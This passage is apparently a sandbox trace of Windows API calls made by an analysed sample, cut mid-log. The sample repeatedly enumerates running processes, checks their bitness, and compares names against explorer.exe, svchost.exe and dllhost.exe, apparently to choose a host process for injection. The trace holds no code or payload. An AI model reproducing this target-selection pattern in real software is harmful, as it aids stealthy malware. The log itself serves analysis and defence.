bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0192.955] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.955] CloseHandle (hObject=0xd8) returned 1 [0192.955] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0192.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0192.955] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.955] CloseHandle (hObject=0xd8) returned 1 [0192.955] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0192.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0192.956] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.956] CloseHandle (hObject=0xd8) returned 1 [0192.956] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0192.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0192.956] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.956] CloseHandle (hObject=0xd8) returned 1 [0192.956] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0192.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0192.957] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.957] CloseHandle (hObject=0xd8) returned 1 [0192.957] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0192.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0192.957] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.957] CloseHandle (hObject=0xd8) returned 1 [0192.958] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0192.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0192.958] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.958] CloseHandle (hObject=0xd8) returned 1 [0192.958] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0192.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0192.959] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.959] CloseHandle (hObject=0xd8) returned 1 [0192.959] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0192.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0192.959] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.959] CloseHandle (hObject=0xd8) returned 1 [0192.959] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0192.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0192.960] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.960] CloseHandle (hObject=0xd8) returned 1 [0192.960] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0192.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0192.960] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.960] CloseHandle (hObject=0xd8) returned 1 [0192.961] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0192.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0192.961] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.961] CloseHandle (hObject=0xd8) returned 1 [0192.961] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0192.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0192.962] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.962] CloseHandle (hObject=0xd8) returned 1 [0192.962] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0192.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0192.962] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.962] CloseHandle (hObject=0xd8) returned 1 [0192.962] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0192.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0192.963] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.963] CloseHandle (hObject=0xd8) returned 1 [0192.963] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0192.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0192.963] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.963] CloseHandle (hObject=0xd8) returned 1 [0192.963] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0192.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0192.964] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.964] CloseHandle (hObject=0xd8) returned 1 [0192.964] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0192.965] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0192.965] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0192.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0192.966] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0192.966] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0192.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0192.967] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0192.967] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0192.968] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.968] CloseHandle (hObject=0xd8) returned 1 [0192.968] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0192.968] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0192.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0192.968] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.968] CloseHandle (hObject=0xd8) returned 1 [0192.968] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0192.968] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0192.968] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0192.968] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0192.969] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0192.969] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.970] CloseHandle (hObject=0xd8) returned 1 [0192.970] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0192.970] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.970] CloseHandle (hObject=0xd8) returned 1 [0192.970] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0192.970] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0192.971] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.971] CloseHandle (hObject=0xd8) returned 1 [0192.971] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.971] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0192.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0192.972] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.972] CloseHandle (hObject=0xd8) returned 1 [0192.972] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0192.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0192.972] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0192.973] CloseHandle (hObject=0xd4) returned 1 [0192.973] Sleep (dwMilliseconds=0x3e8) [0194.010] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0194.013] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0194.013] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0194.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0194.014] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0194.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0194.014] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0194.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0194.015] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0194.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0194.015] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0194.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0194.016] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0194.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0194.016] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0194.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0194.017] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0194.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0194.018] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0194.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0194.018] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0194.019] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0194.019] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0194.020] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0194.020] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0194.021] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0194.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0194.021] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0194.022] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0194.022] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0194.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0194.023] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.023] CloseHandle (hObject=0xd8) returned 1 [0194.023] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0194.023] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0194.023] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0194.023] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0194.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0194.023] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0194.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0194.024] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.024] CloseHandle (hObject=0xd8) returned 1 [0194.024] 